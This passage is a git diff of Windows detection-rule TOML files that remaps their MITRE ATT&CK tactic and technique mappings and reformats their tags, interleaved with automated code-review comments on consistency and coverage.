@@ -44,14 +44,7 @@ references = ["https://attack.mitre.org/techniques/T1078/"] risk_score = 47 rule_id = "b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -77,13 +70,13 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml b/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml index 7a12ba94bc3..8ef66f52c9e 100644 --- a/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml +++ b/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/23" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
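Review bot: The rule's only tactic changes from TA0004 Privilege Escalation to TA0001 Initial Access, yet the file keeps its `privilege_escalation_` path prefix, so the filename now disagrees with the sole tactic it declares; if rule files are named by primary tactic, as the other paths in this patch suggest, either rename the file or keep a TA0004 entry alongside the new TA0001 one, which T1078 supports. Separately, the date hunk for this file sets `updated_date = "2026/03/24"` while every other file in the patch is set to `"2026/03/23"`; if this is one batch update, use the same date. The tag hunk is consistent with the tactic change, so no further mismatch there.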
@@ -42,16 +42,7 @@ references = ["https://www.akamai.com/blog/security-research/abusing-dmsa-for-pr risk_score = 73 rule_id = "2c74e26b-dfe3-4644-b62b-d0482f124210" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -62,27 +53,29 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.AttributeLDAPDi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] 
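Review bot: The tag order is not consistent across the regenerated files: here and at L1351 `"Use Case: Active Directory Monitoring"` comes before the `Tactic:` tags, whereas in the credroaming rule at L1348 it comes after them. If the tags are being rewritten by a tool, the `Use Case:` and `Tactic:` groups should be ordered the same way everywhere, e.g. `"Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Use Case: Active Directory Monitoring"`, so that a later diff does not reshuffle them again. The threat hunk replaces T1078 / T1078.002 with T1098 under both TA0003 and TA0004; dropping Valid Accounts is a coverage decision that the PR description should mention, since nothing else in the section changes.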
diff --git a/rules/windows/privilege_escalation_create_process_as_different_user.toml b/rules/windows/privilege_escalation_create_process_as_different_user.toml index 683648ba45d..412967333f8 100644 --- a/rules/windows/privilege_escalation_create_process_as_different_user.toml +++ b/rules/windows/privilege_escalation_create_process_as_different_user.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,14 +57,7 @@ setup = """## Setup Audit events 4624 and 4688 are needed to trigger this rule. """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] type = "eql" query = ''' 
@@ -83,24 +76,36 @@ sequence by winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" -[[rule.threat.technique.subtechnique]] -id = "T1134.003" -name = "Make and Impersonate Token" -reference = "https://attack.mitre.org/techniques/T1134/003/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml b/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml index ab8e8584da6..5d76a63ef19 100644 --- a/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml +++ b/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
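Review bot: The rewritten mapping removes sub-technique T1134.003 (Make and Impersonate Token) and keeps only T1134.002 under both Defense Evasion and Privilege Escalation; the sequence query is not touched by this patch (only its first line appears in the hunk header), so the removal narrows reported coverage rather than following a detection change. The companion rule at L1347 loses T1134.001 (Token Impersonation/Theft) in the same way. If intentional, a line in the PR description would help; otherwise carry the removed `[[rule.threat.technique.subtechnique]]` into both new tactic entries. Duplicating the T1134 technique block once per tactic is the expected layout, since each `[[rule.threat]]` entry carries exactly one `[rule.threat.tactic]`.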
@@ -19,14 +19,7 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-win risk_score = 47 rule_id = "1b0b4818-5655-409b-9c73-341cac4bb73f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -98,24 +91,36 @@ In Windows environments, tokens are used to represent user credentials and permi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_credroaming_ldap.toml b/rules/windows/privilege_escalation_credroaming_ldap.toml index 50b903484bb..cdb98a74b03 100644 
--- a/rules/windows/privilege_escalation_credroaming_ldap.toml +++ b/rules/windows/privilege_escalation_credroaming_ldap.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,16 +76,7 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Data Source: Active Directory", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -98,14 +89,26 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - 
diff --git a/rules/windows/privilege_escalation_disable_uac_registry.toml b/rules/windows/privilege_escalation_disable_uac_registry.toml index 8d113e3b967..b2289c53690 100644 --- a/rules/windows/privilege_escalation_disable_uac_registry.toml +++ b/rules/windows/privilege_escalation_disable_uac_registry.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,19 +81,7 @@ references = [ risk_score = 47 rule_id = "d31f183a-e5b1-451b-8534-ba62bca0b404" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
@@ -113,51 +101,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml index b68b5bdb6c1..afe20aefbd0 100644 
--- a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml +++ b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/23" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -41,16 +41,7 @@ references = ["https://www.akamai.com/blog/security-research/abusing-dmsa-for-pr risk_score = 73 rule_id = "f0dbff4c-1aa7-4458-9ed5-ada472f64970" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
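Review bot: Tag ordering in the new `tags` line differs from the rest of the patch: here `"Use Case: Active Directory Monitoring"` precedes `"Tactic: Persistence"`, while credroaming_ldap and group_policy_iniscript place the `Tactic:` entries directly after `"Use Case: Threat Detection"`; the krbrelayup_service_creation tags hunk has the same inversion. If tag order is meant to be canonical, move the tactic entry up: `"Use Case: Threat Detection", "Tactic: Persistence", "Use Case: Active Directory Monitoring", ...`. A tag/tactic cross-check will not notice the order, so this is a readability point only.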
@@ -61,27 +52,21 @@ event.code:5137 and host.os.type:"windows" and winlog.event_data.ObjectClass:"ms [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1136/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml index 45a02549dbd..cb6d429664b 100644 --- a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml +++ b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
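Review bot: The Privilege Escalation entry is replaced rather than supplemented: the new side maps only T1136.002 under TA0003, so this rule no longer carries TA0004 at all, unlike credroaming_ldap in this same patch, which keeps TA0004 and adds TA0003 as a second `[[rule.threat]]` entry. The file prefix and the referenced write-up (URL slug `abusing-dmsa-for-pr…` in the hunk context) suggest the escalation angle was part of the original intent, so please confirm the removal is deliberate rather than a side effect of the remap. If TA0004 should remain, a second `[[rule.threat]]` block with `id = "TA0004"` carrying the same T1136.002 technique, or the previous T1098 mapping, would preserve it.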
@@ -59,15 +59,7 @@ references = [ risk_score = 47 rule_id = "5d676480-9655-4507-adc6-4eec311efff8" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -82,14 +74,13 @@ any where host.os.type == "windows" and event.category : ("library", "process") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_driver_newterm_imphash.toml b/rules/windows/privilege_escalation_driver_newterm_imphash.toml index cec1e42a855..8886f6ecb8e 100644 --- a/rules/windows/privilege_escalation_driver_newterm_imphash.toml +++ b/rules/windows/privilege_escalation_driver_newterm_imphash.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -116,36 +116,6 @@ event.category:"driver" and host.os.type:windows and event.action:"load" ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["dll.pe.original_file_name", "dll.code_signature.subject_name"] diff --git a/rules/windows/privilege_escalation_expired_driver_loaded.toml b/rules/windows/privilege_escalation_expired_driver_loaded.toml index d96ccf10bfe..0d8afd54d72 100644 --- a/rules/windows/privilege_escalation_expired_driver_loaded.toml +++ b/rules/windows/privilege_escalation_expired_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
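Review bot: This hunk deletes both `[[rule.threat]]` entries and adds nothing back, so the rule ends up with no ATT&CK mapping at all; no other file in this patch is reduced to zero entries, which makes it look as if a replacement block was dropped by mistake. If the rule is meant to stay unmapped, the `tags` hunk for this file (not in this view) must also remove `"Tactic: Privilege Escalation"`, since a `Tactic:` tag with no matching `rule.threat` tactic is exactly what a tag/tactic cross-check is meant to flag. Otherwise the minimal keep would be the old T1543.003 "Windows Service" entry under `id = "TA0003"`.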
@@ -21,15 +21,7 @@ references = [ risk_score = 47 rule_id = "d12bac54-ab2a-4159-933f-d7bcefa7b61d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -75,31 +67,28 @@ In Windows environments, drivers facilitate communication between the OS and har [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.002" +name = "Code Signing" +reference = "https://attack.mitre.org/techniques/T1553/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_exploit_cve_202238028.toml b/rules/windows/privilege_escalation_exploit_cve_202238028.toml index 7ce5473206a..c44702fa2da 100644 --- a/rules/windows/privilege_escalation_exploit_cve_202238028.toml +++ b/rules/windows/privilege_escalation_exploit_cve_202238028.toml 
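Review bot: Blank-line layout between technique blocks is uneven on the new side: a blank line is inserted between the T1036 `[[rule.threat.technique]]` and its `.subtechnique`, but the newly added T1553 `[[rule.threat.technique]]` follows the T1036.001 block with no separator, and its T1553.002 subtechnique likewise. The same uneven spacing appears in gpo_schtask_service_creation (T1543 directly after T1053.005), installertakeover (T1574.010 directly after T1574) and named_pipe_impersonation (T1134.001 directly after T1134). This reads like hand edits rather than serializer output; regenerating these files through the repository's rule formatter, if one exists, would make the layout uniform and keep later diffs small.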
@@ -2,7 +2,7 @@ creation_date = "2024/04/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ references = [ risk_score = 73 rule_id = "dffbd37c-d4c5-46f8-9181-5afdd9172b4c" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -102,26 +89,13 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml
index 83c8fad1aea..b3ba3c4fba9 100644
--- a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml
+++ b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/13"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -90,36 +90,46 @@ file where host.os.type == "windows" and event.type != "deletion" and event.acti [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" -[[rule.threat.technique.subtechnique]] -id = "T1484.001" -name = "Group Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/001/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.001" +name = "Group Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_group_policy_iniscript.toml b/rules/windows/privilege_escalation_group_policy_iniscript.toml index 1c705e82d44..c3f9d5e1b2e 100644 
--- a/rules/windows/privilege_escalation_group_policy_iniscript.toml +++ b/rules/windows/privilege_escalation_group_policy_iniscript.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,16 +83,7 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" 
@@ -121,24 +112,36 @@ any where host.os.type == "windows" and event.code in ("5136", "5145") and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" - -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml index 1542e312846..eca2ae97085 100644 --- a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml +++ b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/08" integration = ["system", "windows"] maturity = 